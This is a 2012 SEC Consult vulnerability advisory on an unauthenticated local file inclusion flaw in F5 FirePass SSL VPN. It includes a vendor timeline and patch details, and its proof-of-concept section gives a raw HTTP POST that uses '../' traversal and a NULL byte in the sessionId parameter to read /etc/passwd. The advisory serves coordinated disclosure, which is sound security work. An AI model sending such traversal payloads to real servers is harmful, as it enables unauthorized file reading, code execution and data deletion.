124 lines
No EOL
4.3 KiB
Text
124 lines
No EOL
4.3 KiB
Text
SEC Consult Vulnerability Lab Security Advisory < 20121203-0 >
|
|
=======================================================================
|
|
title: Unauthenticated local file inclusion
|
|
product: F5 FirePass SSL VPN
|
|
vulnerable version: <= 7.0.0 HF-70-6
|
|
fixed version: 7.0.0 HF-70-7
|
|
impact: Critical
|
|
homepage: http://www.f5.com
|
|
found: 2012-06-01
|
|
by: S. Viehböck
|
|
SEC Consult Vulnerability Lab
|
|
https://www.sec-consult.com
|
|
=======================================================================
|
|
|
|
Vendor/product description:
|
|
-----------------------------
|
|
"The FirePass SSL VPN" available as an appliance and in a Virtual
|
|
Edition provide security, flexibility, and ease of use. It grants access to
|
|
corporate applications using a technology that everyone understands: a web
|
|
browser. Users can have secure access from anywhere they have an Internet
|
|
connection, while FirePass ensures that connected computers are fully patched
|
|
and protected."
|
|
|
|
"FirePass provides robust, secure SSL VPN remote access to business
|
|
applications from a wide range of client devices, including Apple iPhone and
|
|
Windows Mobile devices. Using full-tunnel SSL technology and client access
|
|
policies defined by system administrators, remote clients can log on to
|
|
corporate business applications under pre-defined access permissions and
|
|
client directory control."
|
|
|
|
URL: http://www.f5.com/products/firepass/
|
|
|
|
|
|
Vulnerability overview/description:
|
|
-----------------------------------
|
|
Due to insufficient input validation, an unauthenticated attacker can disclose
|
|
arbitrary local files with the privileges of the webserver. This includes the
|
|
user/administrator database. As the attacker-controlled path is passed to the
|
|
PHP include() function, code execution is also possible.
|
|
Furthermore, the path is then passed to the unlink() function and therefore can
|
|
be used to delete arbitrary files in the filesystem which causes denial of
|
|
service.
|
|
As opposed to some information on the Internet (e.g.
|
|
https://twitter.com/FirePassHF/status/218886584672587776), it is not necessary
|
|
to have Citrix functionality enabled in order to exploit this vulnerability.
|
|
|
|
|
|
Proof of concept:
|
|
-----------------
|
|
The flaw exists in the CitrixAuth.php script in the parameter "sessionId".
|
|
|
|
An attacker can traverse directories with '../' and terminate the path with a
|
|
NULL byte.
|
|
|
|
The following exploit shows how files can be extracted from the file system:
|
|
|
|
POST /CitrixAuth.php HTTP/1.1
|
|
Host: hostname
|
|
Content-Type: application/none
|
|
Content-Length: 68
|
|
|
|
<sessionId>../../../../../etc/passwd </sessionId>
|
|
-> <- NULL byte
|
|
|
|
|
|
Vulnerable / tested versions:
|
|
-----------------------------
|
|
The vulnerability has been verified to exist in the Firepass SSL VPN version
|
|
7.0.0, which was the most recent version at the time of discovery.
|
|
|
|
|
|
Vendor contact timeline:
|
|
------------------------
|
|
2012-06-05: Contacting vendor security team via email.
|
|
2012-06-07: Response from vendor.
|
|
2012-06-12: Coordination call with vendor.
|
|
2012-06-14: Sent proof of concept exploit via encrypted channel.
|
|
2012 June: Vendor releases HF-388207-1 and informs that solution (=advisory)
|
|
will be published soon.
|
|
2012-08-22: Requesting status of solution.
|
|
2012-08-22: Vendor responds that solution will be published soon.
|
|
2012-10-23: Requesting status of solution.
|
|
2012-10-23: Vendor responds that something went wrong and they will look
|
|
into it.
|
|
2012-11-07: Requesting status of solution.
|
|
2012-11-29: Vendor publishes SOL14046.
|
|
2012-12-03: Public release of SEC Consult advisory.
|
|
|
|
|
|
|
|
Solution:
|
|
---------
|
|
Apply HF-70-7 or HF-388207-1. For detailed information see:
|
|
http://support.f5.com/kb/en-us/solutions/public/14000/000/sol14046.html
|
|
|
|
Patch information is also available at:
|
|
http://support.f5.com/kb/en-us/solutions/public/13000/800/sol13826.html
|
|
|
|
|
|
Workaround:
|
|
-----------
|
|
No workaround available.
|
|
|
|
|
|
Advisory URL:
|
|
--------------
|
|
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
|
|
|
|
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
SEC Consult Unternehmensberatung GmbH
|
|
|
|
Office Vienna
|
|
Mooslackengasse 17
|
|
A-1190 Vienna
|
|
Austria
|
|
|
|
Tel.: +43 / 1 / 890 30 43 - 0
|
|
Fax.: +43 / 1 / 890 30 43 - 25
|
|
Mail: research at sec-consult dot com
|
|
www.sec-consult.com
|
|
|
|
|
|
EOF S. Viehböck / @2012 |